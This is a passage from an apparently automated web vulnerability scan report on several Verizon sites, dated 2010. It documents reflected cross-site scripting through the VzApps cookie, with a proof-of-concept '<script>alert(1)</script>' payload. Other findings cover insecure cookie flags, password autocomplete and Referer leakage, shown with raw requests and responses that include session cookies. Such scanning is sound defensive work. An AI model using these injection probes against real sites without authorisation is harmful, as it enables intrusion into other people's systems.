op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:42:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:42:02 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> 4d80b<script>alert(1)</script>dfd32d9c68b</span>
...[SNIP]...

3.304. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /foryourhome/fttprepair/nr/common/MainMenu.aspx

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload f407d<script>alert(1)</script>0ced4116a66 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /foryourhome/fttprepair/nr/common/MainMenu.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf407d<script>alert(1)</script>0ced4116a66; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:41:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:41:57 GMT
Connection: close


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TXf407d<script>alert(1)</script>0ced4116a66 </span>
...[SNIP]...

4. SSL cookie without secure flag set  previous  next
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


4.1. https://www36.verizon.com/fiostv/web/Signin.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /fiostv/web/Signin.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fiostv/web/Signin.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
RequestInfo: Served From :: BHDP1ISFTW05, Time Taken :: 406.2474
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172510
Date: Sat, 20 Nov 2010 03:04:08 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=enqz1b45ldlygb45bcucegq3; path=/; HttpOnly
Set-Cookie: DCReferringURL=/Signin.aspx; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Verizon | FiOS TV Central .
...[SNIP]...

4.2. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /fiostv/web/unprotected/showtime.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fiostv/web/unprotected/showtime.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 78.123
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24516
Date: Sat, 20 Nov 2010 03:04:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=wb5cyl55wlsb3445xgv2idj4; path=/; HttpOnly
Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/


<html>
<body onload=ShowtimePlayer()>
<link rel="stylesheet" type="text/css" href="/fiostv/web/Resources/V_111510_1425/css/FTVStyles.css">

<script type="text/javascript">
var TargetURL = '
...[SNIP]...

4.3. https://www36.verizon.com/fiosvoice/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www36.verizon.com
Path:   /fiosvoice/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fiosvoice/ HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 20582
Expires: Sat, 20 Nov 2010 03:04:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:04:12 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=anbrwlbkau52u2vo5euf5y45; path=/; HttpOnly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>SignIn</title><link rel="stylesheet" type="text/css" href="/FiOSVoice/Resources/V_102510_0938/css/Styles.css"></he
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www2.verizon.net/help/dsl_settings/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www2.verizon.net
Path:   /help/dsl_settings/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/dsl_settings/ HTTP/1.1
Host: www2.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 139
Content-Type: text/html
Cache-Control: private
Date: Sat, 20 Nov 2010 03:06:55 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSQRTBTDT=IHPHDNIDIIFPACJGGLIHPLLP; path=/


           <script language="javascript">window.location = "http://my.verizon.com/micro/speedoptimizer/hsi/default.aspx"

</script>    
           


5.2. http://www2.verizon.net/micro/speedtest/hsi/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www2.verizon.net
Path:   /micro/speedtest/hsi/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /micro/speedtest/hsi/ HTTP/1.1
Host: www2.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://my.verizon.com/micro/speedtest/broadband/
Content-Length: 169
Content-Type: text/html
Cache-Control: private
Date: Sat, 20 Nov 2010 03:06:55 GMT
Connection: close
Set-Cookie: ASPSESSIONIDSQRTBTDT=JHPHDNIDCEBHDNBGBMPHKFGD; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://my.verizon.com/micro/speedtest/broadband/">here</a>.</body>

5.3. http://www35.vzw.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www35.vzw.com
Path:   /HG

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HG?hc=&hb=DM570118F3VN%3BDM570203L6VD&cd=1&hv=6&n=home&con=&vcon=/microsites/ptt&tt=auto&ja=y&dt=19&zo=360&lm=1284069179000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&hid=0.9877317685168236 HTTP/1.1
Host: www35.vzw.com
Proxy-Connection: keep-alive
Referer: http://solutions.vzwshop.com/PTT/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 20 Nov 2010 03:03:49 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: CTG=1290222229; path=/; domain=www35.vzw.com; expires=Sat, 27-Nov-2010 03:03:49 GMT; max-age=604800
Cneonction: close
Pragma: no-cache
Cache-Control: max-age=0, private, proxy-revalidate
Expires: Sat, 20 Nov 2010 03:03:50 GMT
Location: http://www35.vzw.com/HGct?hc=&hb=DM570118F3VN%3BDM570203L6VD&cd=1&hv=6&n=home&con=&vcon=/microsites/ptt&tt=auto&ja=y&dt=19&zo=360&lm=1284069179000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&hid=0.9877317685168236
Content-Type: image/gif
Content-Length: 0


5.4. https://www36.verizon.com/fiostv/web/Signin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv/web/Signin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fiostv/web/Signin.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
RequestInfo: Served From :: BHDP1ISFTW05, Time Taken :: 406.2474
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172510
Date: Sat, 20 Nov 2010 03:04:08 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=enqz1b45ldlygb45bcucegq3; path=/; HttpOnly
Set-Cookie: DCReferringURL=/Signin.aspx; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Verizon | FiOS TV Central .
...[SNIP]...

5.5. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv/web/unprotected/showtime.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fiostv/web/unprotected/showtime.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
RequestInfo: Served From :: BHDP1ISFTW06, Time Taken :: 78.123
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24516
Date: Sat, 20 Nov 2010 03:04:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=wb5cyl55wlsb3445xgv2idj4; path=/; HttpOnly
Set-Cookie: DCReferringURL=/ShowTime.aspx; path=/


<html>
<body onload=ShowtimePlayer()>
<link rel="stylesheet" type="text/css" href="/fiostv/web/Resources/V_111510_1425/css/FTVStyles.css">

<script type="text/javascript">
var TargetURL = '
...[SNIP]...

6. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www36.verizon.com
Path:   /fiostv/web/Signin.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /fiostv/web/Signin.aspx HTTP/1.1
Host: www36.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
RequestInfo: Served From :: BHDP1ISFTW05, Time Taken :: 406.2474
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172510
Date: Sat, 20 Nov 2010 03:04:08 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=enqz1b45ldlygb45bcucegq3; path=/; HttpOnly
Set-Cookie: DCReferringURL=/Signin.aspx; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Verizon | FiOS TV Central .
...[SNIP]...
</script>

<form name="aspnetForm" method="post" action="Signin.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td>
<input id="Password" name="Password" style="width: 200px;" type="password" value=""
onkeydown="HandleEnterKey(event);" tabindex="2" />

</td>
...[SNIP]...

7. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


7.1. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62955
Expires: Sat, 20 Nov 2010 03:08:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:08:40 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<LI><A style="WIDTH: 63px" id=GHWireless title="Verizon Wireless" href="http://www.verizonwireless.com/" name=&amp;lid=hp_wireless_tab>Wireless</A>
...[SNIP]...
<LI><A href="http://www.verizonwireless.com/b2c/index.html" name=&amp;lid=overlay_phone_wireless><IMG alt="" src="/Content/Commonfiles/images/globalheader/new_header/i/wireless.gif">
...[SNIP]...
<DIV class="col12 clear icons"><A href="http://www.bbbonline.org/cks.asp?id=108072593112" name=&lid=hp_res_footer_bbb_logo target=_blank><IMG alt="Click to verify BBB accreditation and to see a BBB report." src="/Content/LearnShop/Images/footer/bbb.jpg"></A><A href="http://www.truste.org/ivalidate.php?url=www.verizon.com&sealid=101" name=&lid=hp_res_footer_truste_logo target=_blank><IMG class=bright alt="Reviewed by TRUSTe site privacy statement." src="/Content/LearnShop/Images/footer/truste.jpg">
...[SNIP]...
<LI><A href="http://www.thinkfinity.org/" name=&lid=hp_bus_footer_vzthinkfinity>Verizon Thinkfinity</A>
...[SNIP]...

7.2. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

